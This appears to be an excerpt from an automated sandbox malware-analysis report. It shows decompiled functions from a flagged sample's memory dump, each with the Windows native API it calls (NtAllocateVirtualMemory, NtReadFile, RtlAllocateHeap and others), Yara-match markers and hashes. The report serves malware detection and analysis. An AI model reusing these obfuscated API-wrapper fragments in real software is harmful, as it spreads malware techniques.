NtReadFile.NTDLL(00413D12,5E972F59,FFFFFFFF,004139D1,?,?,00413D12,?,004139D1,FFFFFFFF,5E972F59,00413D12,?,00000000), ref: 00418275

Memory Dump Source

Source File: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 296ae86af33e55f6fdcfd20ed76a933a3c426c6cf747ab0418c17546ac81df3a
Instruction ID: 8b93fdeb18aa62919fd9b67a27f197b50e85fd5e81ea97725df436ca6712b3eb
Opcode Fuzzy Hash: 296ae86af33e55f6fdcfd20ed76a933a3c426c6cf747ab0418c17546ac81df3a
Instruction Fuzzy Hash: D5F0E7B2200108ABCB14DF89DC80EEB77A9BF8C354F158249FA1DA7251C630E8518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00418230, Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418230(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418D80(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}

0x00418233
0x0041823f
0x00418247
0x00418275
0x00418279

APIs

NtReadFile.NTDLL(00413D12,5E972F59,FFFFFFFF,004139D1,?,?,00413D12,?,004139D1,FFFFFFFF,5E972F59,00413D12,?,00000000), ref: 00418275

Memory Dump Source

Source File: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 34a3e3c40f91502aeb4d2aa89f59f326de5eb9f8ac5d275f0c8204906c50d898
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 32F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249FA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418360, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418360(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418D80(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041836f
0x00418377
0x00418399
0x0041839d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F54,?,00000000,?,00003000,00000040,00000000,00000000,00408AC3), ref: 00418399

Memory Dump Source

Source File: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: d1f298eb440679fc3bab8657f838a800a217d6648e579a06cd3cc162b437aef0
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 96F015B2200208ABCB14DF89DC81EEB77ADAF88754F158149FE0897241C630F810CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 0041835E, Relevance: 1.5, APIs: 1, Instructions: 28
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041835E(char __eax, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t15;
				void* _t22;

				asm("daa");
				 *0x8bec8b55 = __eax;
				_t11 = _a4;
				_t3 = _t11 + 0xc60; // 0xca0
				E00418D80(_t22, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}

0x0041835e
0x0041835f
0x00418363
0x0041836f
0x00418377
0x00418399
0x0041839d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F54,?,00000000,?,00003000,00000040,00000000,00000000,00408AC3), ref: 00418399

Memory Dump Source

Source File: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 24afb6ed2fe8b94809c580a3940f555e4e22fff2aa0f2caae278aecb8b9166b4
Instruction ID: 26a4ad37998e20f872e6e0aaa2899de1750dda7a1ce20c1b9ba2ec6c5f596954
Opcode Fuzzy Hash: 24afb6ed2fe8b94809c580a3940f555e4e22fff2aa0f2caae278aecb8b9166b4
Instruction Fuzzy Hash: B0F0A0B5100188AFCB04DF98DC80CA777A8AF88210B04865EF94897202C234D814CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 004182AA, Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004182AA(intOrPtr _a8, void* _a12) {
				long _t8;
				void* _t11;

				asm("a16 adc eax, 0x5547db0b");
				_t5 = _a8;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409713
				E00418D80(_t11, _a8, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a12); // executed
				return _t8;
			}

0x004182ab
0x004182b3
0x004182b6
0x004182bf
0x004182c7
0x004182d5
0x004182d9

APIs

NtClose.NTDLL(00413CF0,?,?,00413CF0,00408AC3,FFFFFFFF), ref: 004182D5

Memory Dump Source

Source File: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 2d5046458bc977f8aedde365fca88ffd8ee788c8fe4890d66a0bb913b23ef4f3
Instruction ID: f60b42a911ccf2d9c0d7d4219487f39fa3c4a92275f438de1feae2a9f4256948
Opcode Fuzzy Hash: 2d5046458bc977f8aedde365fca88ffd8ee788c8fe4890d66a0bb913b23ef4f3
Instruction Fuzzy Hash: 81E0C2312002046BD710EFD4CC89FE77B68EF44710F144459FA089B242C530EA008BD0

Uniqueness

Uniqueness Score: -1.00%

Function 004182B0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004182B0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409713
				E00418D80(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x004182b3
0x004182b6
0x004182bf
0x004182c7
0x004182d5
0x004182d9

APIs

NtClose.NTDLL(00413CF0,?,?,00413CF0,00408AC3,FFFFFFFF), ref: 004182D5

Memory Dump Source

Source File: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 6b68d8a54e684a6abef8896f3696699f2b4952745b0db19f1cfc41b8081163df
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 17D01776240318ABD710EF99DC85EE77BACEF48760F154499FA189B282C930FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 02F39A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F39A5A

Memory Dump Source

Source File: 00000005.00000002.263468696.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 252aacfe9996d2cbda9048806ed7d33fcbb3133abc9a38eddf75bbd34c2b7ac6
Instruction ID: 1f454edd6a54720f51059f5ec8c1c89a670f2b2311fc66ead43ed21385ef2556
Opcode Fuzzy Hash: 252aacfe9996d2cbda9048806ed7d33fcbb3133abc9a38eddf75bbd34c2b7ac6
Instruction Fuzzy Hash: 3D90026131180042D20065694C14B07140597D0383F51C115A2145594CCD9589616561

Uniqueness

Uniqueness Score: -1.00%

Function 02F39A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F39A2A

Memory Dump Source

Source File: 00000005.00000002.263468696.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1a34446a5db36a2932d9cdfc9058b70634dbcc497b35b977a2f94114c1bd9e4a
Instruction ID: b819913c1b92c3b85f573f55458fbeb29aa081348549dd12a808c43da7d683e5
Opcode Fuzzy Hash: 1a34446a5db36a2932d9cdfc9058b70634dbcc497b35b977a2f94114c1bd9e4a
Instruction Fuzzy Hash: C6900261701000424140716988449075405BBE1291751C121A2989590D89D9896566A5

Uniqueness

Uniqueness Score: -1.00%

Function 02F39A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F39A0A

Memory Dump Source

Source File: 00000005.00000002.263468696.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 406bcc74218f562ffe3182cbf89146a6eec7663db23267245f5c9ee81e9e5d48
Instruction ID: 8ea53cf407e81a5b9a9d4cb6da9ae976139236e119d61174b56daf8e14af04db
Opcode Fuzzy Hash: 406bcc74218f562ffe3182cbf89146a6eec7663db23267245f5c9ee81e9e5d48
Instruction Fuzzy Hash: 3E90027130140402D1006159481470B140597D0382F51C011A3155595D8AA5895175B1

Uniqueness

Uniqueness Score: -1.00%

Function 02F398F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F398FA

Memory Dump Source

Source File: 00000005.00000002.263468696.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 04146b3c9ccc884c6ed120eb8dbc15feb8c979aaed404b377b26b0da0b6342fa
Instruction ID: 45ded0e609cc15db3a4e62ac0611e50e6c3bbdc0fe877b6efd3be043c0ddb534
Opcode Fuzzy Hash: 04146b3c9ccc884c6ed120eb8dbc15feb8c979aaed404b377b26b0da0b6342fa
Instruction Fuzzy Hash: 9890026170100502D10171594404617140A97D02C1F91C022A3015595ECEA58A92B171

Uniqueness

Uniqueness Score: -1.00%

Function 02F39860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F3986A

Memory Dump Source

Source File: 00000005.00000002.263468696.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3644dd7d2815fc07d1cfb0906221c47515767866c2988ea15821b4f9865067ca
Instruction ID: f08d9910350c19bf8b4bf60c82955ce00fca0b6a20262b61807a5948f4a26144
Opcode Fuzzy Hash: 3644dd7d2815fc07d1cfb0906221c47515767866c2988ea15821b4f9865067ca
Instruction Fuzzy Hash: 6090027130100413D11161594504707140997D02C1F91C412A2415598D9AD68A52B161

Uniqueness

Uniqueness Score: -1.00%

Function 02F39840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F3984A

Memory Dump Source

Source File: 00000005.00000002.263468696.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9f640a18b13edc50b8bea6bc8b223d2dee4fa09bb4541f8a1b5157e6abeb8dd2
Instruction ID: 9cef84584605ac5c048ff3cb89b0a22a578799e995fdb34993c350b02f3433e2
Opcode Fuzzy Hash: 9f640a18b13edc50b8bea6bc8b223d2dee4fa09bb4541f8a1b5157e6abeb8dd2
Instruction Fuzzy Hash: 18900261342041525545B15944045075406A7E02C1791C012A3405990C89A69956E661

Uniqueness

Uniqueness Score: -1.00%

Function 02F399A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F399AA

Memory Dump Source

Source File: 00000005.00000002.263468696.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3d3e2e6bb94d326cc988162717c3edb69f3b75bc5515fdcbbe4a6b8588042011
Instruction ID: 0a4c6f80aee01540b8e029cec8cb18f178ff98b26bbd96d1a21bac9d9d20d473
Opcode Fuzzy Hash: 3d3e2e6bb94d326cc988162717c3edb69f3b75bc5515fdcbbe4a6b8588042011
Instruction Fuzzy Hash: 019002A134100442D10061594414B071405D7E1381F51C015E3055594D8A99CD527166

Uniqueness

Uniqueness Score: -1.00%

Function 02F39910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F3991A

Memory Dump Source

Source File: 00000005.00000002.263468696.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4282d1ba51f274c799bb9be651dc1442778dc6d177a18147103821e03ff07c0a
Instruction ID: 84d5a7c1cd816ea1863d56c2caada322bdd9f67befbf6fe2274844c32fd36840
Opcode Fuzzy Hash: 4282d1ba51f274c799bb9be651dc1442778dc6d177a18147103821e03ff07c0a
Instruction Fuzzy Hash: 5C9002B130100402D14071594404747140597D0381F51C011A7055594E8AD98ED576A5

Uniqueness

Uniqueness Score: -1.00%

Function 02F396E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F396EA

Memory Dump Source

Source File: 00000005.00000002.263468696.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2e388aebae1987f5cdb6b9c2e6a31e2f7434467f4cfb4ce0f724e6d84707e1aa
Instruction ID: bfd0f2cfb206296dd2042af5627e519a4caa13b10d39570b43d11a4eb2058f4d
Opcode Fuzzy Hash: 2e388aebae1987f5cdb6b9c2e6a31e2f7434467f4cfb4ce0f724e6d84707e1aa
Instruction Fuzzy Hash: D190027130108802D1106159840474B140597D0381F55C411A6415698D8AD589917161

Uniqueness

Uniqueness Score: -1.00%

Function 02F39660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F3966A

Memory Dump Source

Source File: 00000005.00000002.263468696.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ffc14ca2db9480c6a4dd80339bb8d3371e56883aafe7d012b210a0eeb5fa7981
Instruction ID: b6097ee94e2b02813334a34bb9f487843f9812a737fbcc5c9016df7f91c87e28
Opcode Fuzzy Hash: ffc14ca2db9480c6a4dd80339bb8d3371e56883aafe7d012b210a0eeb5fa7981
Instruction Fuzzy Hash: B590027130100802D1807159440464B140597D1381F91C015A2016694DCE958B5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 02F39FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F39FEA

Memory Dump Source

Source File: 00000005.00000002.263468696.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9d5d6f13172bb7689c045599dbe28ad55878519e50f8dd93cf5e7e330f58e36d
Instruction ID: 2f784a436a1962472cae908d7b5d8d070e645450aae6e8c940c7fccea74c92a7
Opcode Fuzzy Hash: 9d5d6f13172bb7689c045599dbe28ad55878519e50f8dd93cf5e7e330f58e36d
Instruction Fuzzy Hash: AB90027131114402D11061598404707140597D1281F51C411A2815598D8AD589917162

Uniqueness

Uniqueness Score: -1.00%

Function 02F397A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F397AA

Memory Dump Source

Source File: 00000005.00000002.263468696.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 42b9c570855cd2da055867e4ac77acde1c852272618c155122c358fc58d2ab7d
Instruction ID: e05c6655d1448b2dbba0ce064869e8c5870db9d626186f81d6f27738d536ac88
Opcode Fuzzy Hash: 42b9c570855cd2da055867e4ac77acde1c852272618c155122c358fc58d2ab7d
Instruction Fuzzy Hash: 2290026130100003D140715954186075405E7E1381F51D011E2405594CDD9589566262

Uniqueness

Uniqueness Score: -1.00%

Function 02F39780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F3978A

Memory Dump Source

Source File: 00000005.00000002.263468696.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6e8f5c76fe5aab03293372af329c52eaab6b9b306e582eaa69b6c385c33fb56d
Instruction ID: a46291bfa172932c27291cb5a236caa71cb73d455549845d5776e849e6ca6a99
Opcode Fuzzy Hash: 6e8f5c76fe5aab03293372af329c52eaab6b9b306e582eaa69b6c385c33fb56d
Instruction Fuzzy Hash: DC90026931300002D1807159540860B140597D1282F91D415A2006598CCD9589696361

Uniqueness

Uniqueness Score: -1.00%

Function 02F39710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F3971A

Memory Dump Source

Source File: 00000005.00000002.263468696.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2cec892915eda6a585762a0f57706d204a551a17eab75ac28a08d7a0f2ebfa32
Instruction ID: e99e16bd8f292eed8728cb6f0cd67456eb551675d603e94688789c8273e5e3ac
Opcode Fuzzy Hash: 2cec892915eda6a585762a0f57706d204a551a17eab75ac28a08d7a0f2ebfa32
Instruction Fuzzy Hash: A690027130100402D10065995408647140597E0381F51D011A7015595ECAE589917171

Uniqueness

Uniqueness Score: -1.00%

Function 02F395D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F395DA

Memory Dump Source

Source File: 00000005.00000002.263468696.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 100868361a63a6ddff882fc972206955d6faf19dd7e3db6626e902cdb5fa6a0f
Instruction ID: 402a854d0c2609f71ce343aa3f4ef39f0d51aeb50562389b82116ee965aed81a
Opcode Fuzzy Hash: 100868361a63a6ddff882fc972206955d6faf19dd7e3db6626e902cdb5fa6a0f
Instruction Fuzzy Hash: 589002A130200003410571594414617540A97E0281B51C021E30055D0DC9A589917165

Uniqueness

Uniqueness Score: -1.00%

Function 02F39540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F3954A

Memory Dump Source

Source File: 00000005.00000002.263468696.0000000002ED0000.00000040.00000001.sdmp, Offset: 02ED0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c3f87cc7316224d9b1517aafd3e33b7ce1fa169919fe8dcf768ceaac5e8555f8
Instruction ID: 44c93c1721afd7d408d84be43c084d77551f77ae3d51ef64a65637f236ee057a
Opcode Fuzzy Hash: c3f87cc7316224d9b1517aafd3e33b7ce1fa169919fe8dcf768ceaac5e8555f8
Instruction Fuzzy Hash: 1A900265311000030105A5590704507144697D53D1351C021F3006590CDAA189616161

Uniqueness

Uniqueness Score: -1.00%

Function 00418450, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E00418450(intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16) {
				intOrPtr _t9;
				void* _t10;
				void* _t12;
				void* _t15;

				E00418D80(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t9 = _a12;
				_t12 = _a8;
				asm("adc al, 0x52");
				_push(_t9);
				_t10 = RtlAllocateHeap(_t12); // executed
				return _t10;
			}

0x00418467
0x0041846f
0x00418472
0x00418477
0x0041847b
0x0041847d
0x00418481

APIs

RtlAllocateHeap.NTDLL(004134D6,?,O<A,00413C4F,?,004134D6,?,?,?,?,?,00000000,00408AC3,?), ref: 0041847D

Strings

O<A, xrefs: 0041846C, 00418478

Memory Dump Source

Source File: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: O<A
API String ID: 1279760036-4138670870
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 9fa6c2a4f9633cfc5a37005c67ac026404774a63ffe1ff48ae04740aea020376
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: F5E012B1200208ABDB14EF99DC41EA777ACAF88654F158559FA085B282CA30F9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 00418661, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF72,0040CF72,00000041,00000000,?,00408B35), ref: 00418620

Memory Dump Source

Source File: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 20f181ee2f9a4d403659a02d29da09e451f013aed3185484192611c5c9dd44b2
Instruction ID: 28c1cd049c30f16bbecfebfc575b003bba396da139df6114ca21f80d6bd29f66
Opcode Fuzzy Hash: 20f181ee2f9a4d403659a02d29da09e451f013aed3185484192611c5c9dd44b2
Instruction Fuzzy Hash: 4C019EB62002047BDB10EF98DC84EE777ADEF89360F008559F90D5B242DA35E9418BB4

Uniqueness

Uniqueness Score: -1.00%

Function 00407070, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00407070(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E00419CE0( &_v67, 0, 0x3f);
				E0041A8C0( &_v68, 3);
				_t13 = E00413DF0(_a4 + 0x1c, E00409AF0(_t30, _a4 + 0x1c,  &_v68), 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409250(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407070
0x0040707f
0x00407083
0x0040708e
0x004070ae
0x004070b3
0x004070ba
0x004070bd
0x004070ca
0x004070cc
0x004070ce
0x004070eb
0x004070eb
0x00000000
0x004070ed
0x004070f2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004070CA

Memory Dump Source

Source File: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 1bc65d02fe6496cc537dcaa5988f1c03b553ae92fcf2c31df00b834e94756268
Instruction ID: 18ef527c81d78d6cf94a666dde549eb5d4912ba5f30213c62aa7d6dc7e6a36c6
Opcode Fuzzy Hash: 1bc65d02fe6496cc537dcaa5988f1c03b553ae92fcf2c31df00b834e94756268
Instruction Fuzzy Hash: A601A731A8022877E720AA959C43FFF776C9B40B55F04411AFF04BA1C2E6E8790646FA

Uniqueness

Uniqueness Score: -1.00%

Function 00418595, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF72,0040CF72,00000041,00000000,?,00408B35), ref: 00418620

Memory Dump Source

Source File: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 2595a0c037b8fa077421c6b0199177a60158fe03142308ca9ae15853212dffc4
Instruction ID: 7af15cd47dbe46ff6c08a813766486ecbeb00b55857519d93dd56ba7f348f973
Opcode Fuzzy Hash: 2595a0c037b8fa077421c6b0199177a60158fe03142308ca9ae15853212dffc4
Instruction Fuzzy Hash: 58018CB5200248AFDB10EF59DC81EEB7BADEF89354F158549FD8897642CA34E814CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00418482, Relevance: 1.5, APIs: 1, Instructions: 25
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418482(void* __ecx, signed int __edx, void* __fp0, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t16;
				void* _t23;
				signed int _t27;

				asm("cli");
				asm("sti");
				asm("das");
				asm("out dx, eax");
				asm("adc eax, 0xf4d7ec55");
				 *(0x458bec8b + __edx * 2) =  *(0x458bec8b + __edx * 2) ^ _t27;
				_push(_t27);
				_t13 = _a4;
				_t9 = _t13 + 0xc74; // 0xc74
				E00418D80(_t23, _a4, _t9,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t16 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t16;
			}

0x00418482
0x00418483
0x00418484
0x00418488
0x00418489
0x0041848e
0x00418490
0x00418493
0x0041849f
0x004184a7
0x004184bd
0x004184c1

APIs

RtlFreeHeap.NTDLL(00000060,00408AC3,?,?,00408AC3,00000060,00000000,00000000,?,?,00408AC3,?,00000000), ref: 004184BD

Memory Dump Source

Source File: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 4ab70dede3f9c5464aee8c2cea39ce3d83c76a55d2aa76cc1ff6b9666d29efd3
Instruction ID: 751f87b4307d05d44f2204c6af7428c6d423610a7451941b74262ee4c36af803
Opcode Fuzzy Hash: 4ab70dede3f9c5464aee8c2cea39ce3d83c76a55d2aa76cc1ff6b9666d29efd3
Instruction Fuzzy Hash: EEE0D8B81242455BDB14FF75E88089737A6AF81314314455EE84997617CA36D46987A0

Uniqueness

Uniqueness Score: -1.00%

Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418490(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418D80(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041849f
0x004184a7
0x004184bd
0x004184c1

APIs

RtlFreeHeap.NTDLL(00000060,00408AC3,?,?,00408AC3,00000060,00000000,00000000,?,?,00408AC3,?,00000000), ref: 004184BD

Memory Dump Source

Source File: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 03c2f956527c42d7b276241e6fe07b9733b4616027d909c5946ae0997d1efc6f
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 4EE01AB12002086BD714EF59DC45EA777ACAF88750F014559F90857241C630E9108AF0

Uniqueness

Uniqueness Score: -1.00%

